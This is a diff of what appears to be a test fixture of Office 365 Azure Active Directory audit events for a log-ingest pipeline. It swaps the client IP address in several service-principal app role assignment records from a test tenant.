@@ -2797,7 +2797,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -2827,9 +2827,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:34:47",
 "ExtendedProperties": [
 {
@@ -3063,7 +3063,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -3093,9 +3093,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:34:47",
 "ExtendedProperties": [
 {
@@ -3329,7 +3329,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Valu